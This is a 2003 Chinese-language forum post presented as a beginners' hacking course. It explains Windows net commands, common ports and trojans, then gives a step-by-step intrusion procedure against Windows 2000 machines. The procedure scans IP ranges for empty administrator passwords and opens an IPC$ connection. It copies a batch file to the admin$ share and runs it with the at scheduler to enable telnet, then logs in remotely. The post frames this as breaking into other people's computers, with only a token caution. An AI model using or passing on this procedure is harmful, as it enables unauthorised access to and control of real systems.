[这个贴子最后由blacksabre在 2003/05/26 06:45pm 第 1 次编辑]
-------------作者:默读忧伤 \\*本文欢迎转载但请注明作者*\\
前言:你是不是很想做黑客呢?是不是经常周游于各个黑客站点呢?学黑客是真的很难的!它需要你有足够的耐性!毅力!只有持之以恒才能有所成就!好了~灌了那么多的水,下面就开始吧!注意:本文只适合新手!已入门的请去看别的技术文章吧!下面就用我仅仅知道的知识让你们取得第一次的成功吧!\\操作系统拜托你装个2000的好不好?不要再问为什么了~\\(本文注释用"\\注释内容\\"标记!
第一节课:命令的使用
你必须懂得一些命令才能更好地运用!总不能一边入侵一边去看例文吧!(什么?你喜欢?我晕了~)好了~下面就看看一些常用的命令吧!也就是入侵必须懂得的基本命令!如果你连这都栏得看的话你就可以放学了~放你的长假去吧!
1.net
NET [ ACCOUNTS | COMPUTER | CONFIG | CONTINUE | FILE | GROUP | HELP |
HELPMSG | LOCALGROUP | NAME | PAUSE | PRINT | SEND | SESSION |
SHARE | START | STATISTICS | STOP | TIME | USE | USER | VIEW ]
上面就是net命令.你可以在开始-运行里键入command
(dos)下键入net/?获得.我们看看一些常用的.
net user \\列举所有用户\\ 例子:c:\>net user
net localgroup \\把用户分组\\ 例子:c:\>net localgroup administrators guest /add \\把guest用户加到管理组.需要有足够的权限才能进行操作!\\
net share \\显示共享资源\\ 例子:c:\>net share
net start \\启动服务,或显示已启动服务的列表\\ 例子:\>net start 例子:\>net start telnet \\启动telnet\\
net stop \\停止Windows2000网络服务\\ 例子c:\>net stop telnet \\停止telnet服务\\
net time \\显示时间\\ 例子:c:\>net time 127.0.0.1 \\显示127.0.0.1的时间\\
net use \\显示关于计算机连接的信息\\ 例子:c:\>net use
net view \\显示域列表、计算机列表或者由指定计算机共享的资源\\ 例子:c:\>net view
net的基本命令就到此结束吧!但并不是说其它的命令不用去学!只是我的基本教学(入侵)课程需要用的命令是这些而已~自己去windows帮助那里看看吧!DOS下的基本命令是很重要的!如:copy等.还有ftp等等重要的命令因为种种原因请各位自行去看.(基本课程不能太复杂的,OK?!!!)好了~下课~
第二节课:端口和木马
A.第二节课了~这节课我们首先来学习一下端口吧!什么是端口?就是计算机和外界连接的通道!例如我们看网页用的实际上是80端口.
1)、telnet登录的端口 (23/tcp)
这个信息表明远程登录服务正在运行,在这里你可以远程登录到该主机.
2)、WWW(80/TCP)端口
它表明WWW服务在该端口运行
别告诉我你不知道WWW服务是什么哦,也就是说,如果有网站的服务器都有80端口。
3)、FTP(21/tcp)
ftp服务和TELNET服务一样,你还可以从FTP服务器上获得或上传资料木马等,有的还是匿名登陆的,不过这样的好事好像不多。
4)、finger (79/tcp) 端口
finger服务对入侵者来说是一个非常有用的信息,从它可以获得用户信息,查看机器的运行情况等。
5)、远程控制(3389)
这个端口用于远程登陆.
还有一些常见的端口例如110,135,139,25等等等.....我们这次基础教程需要用到的是23端口.其它的因为觉得重要所以也列举了出来.剩下的请自己去补补.(不是我不负责任.是课程的问题!请谅解!)PS:并不是所有的端口都是有用的.
B.木马
讲个故事给大家听吧!---->>传说希腊人围攻特洛伊城,久久不能得手。后来想出了一个木马计,让士兵藏匿于巨大的木马中。大部队假装撤退而将木马摈弃于特洛伊城下,让敌人将其作为战利品拖入城内。木马内的士兵则乘夜晚敌人庆祝胜利、放松警惕的时候从木马中爬出来,与城外的部队里应外合而攻下了特洛伊城。
木马的危害性是很大的!例如冰河等木马甚至可以远程控制你的电脑!同时木马也会打开一些端口.你也可以借查看端口来看看有没木马在你的电脑上运行.不过有的木马是利用已有的端口的.这个就比较麻烦了.需要用杀毒软件帮忙了~ \\我们的课程并不需要使用到木马.只是本人认为各位值得一学\\
第三节课:ipc入侵.
好了~估计你们看了那么多基础的东西已经很不耐烦了~这节课就来实行你的第一次入侵吧!咳咳~放下你的AK-47,我们不需要那个家伙....
A.什么是ipc?
IPC$是共享“命名管道”的资源,它对于程序间的通讯很重要。在远程管理计算机和查看计算机的共享资源时使用.利用IPC$我们可以与目标主机建立一个空的连接(无需用户名与密码),而利用这个空的连接,我们就可以得到目标主机上的用户列表。用“流光”的IPC$探测功能,就可以得到用户列表了,并可以配合字典,进行密码尝试。
B.OK!运用你在上两节课学到的知识跟我冲吧!掌握好你的命令使用了吗?
需要用的的扫描软件:xscan 操作系统:win2000(不要告诉我你那还是98或者me,我马上K了你!)
首先我们使用扫描器扫描一个IP段.打开xscan,选择"设置",再选"扫描模块",然后只选nt弱口令的那项.确定后选"设置","扫描参数"然后填入IP段.就127.0.0.1-127.0.0.255吧!(注意:IP段纯属虚构.)
假设我们已经扫到一个了.127.0.0.2 用户名:Administrator 密码:空(唉~真搞不清现在的人为什么这么没安全意识...)
打开cmd,输入:net use \\127.0.0.1\ipc$ "" /user:"Administrator" 命令成功完成.OK!下一步~
at \\127.0.0.1 \\这步纯属个人习惯.因为我想知道他开了AT没有.没开就放弃吧\\
接下来我们需要编辑一个批处理文件.打开记事本,输入如下内容net start telnet 然后保存为a.bat \\注意扩展名!是bat!\\
编辑好后就继续吧! copy a.bat \\127.0.0.1\admin$ \\admin$就是放在目标winnt的根目录下\\
net time \\127.0.0.1 \\看看目标的时间吧!有用的~\\
假设是晚上9点.接着下一步吧!
at \\127.0.0.1 20:01 a.bat \\用AT命令让目标运行a.bat.注意时间要24小时制的!\\
net time \\127.0.0.1 \\看看到时间没?\\
假设到了,我们就实行下一步吧!
telnet 127.0.0.1 \\登陆到对方的机子上.刚才的那个批处理就是用来打开它的23端口的~\\
接着输入用户名和密码 \\就是用户Administrator啊!密码是空的.回车就行了~\\
OK!一切成功!现在你可以做你想做的事了~例如添加用户等等(就是命令的使用啊!所以说命令重要!)
请同学们注意不要乱删除别人的东西!我们只是学习技术.谁乱动我立即把他开除.
---------------基础课程<完>
好了~现在你们应该可以去实行自己的第一次入侵了~当然实际操作中并不全像上面的那么容易.会出现很多问题的.例如at不能执行.telnet上去时需要验证等等.这就留待你们自己去解决了~ |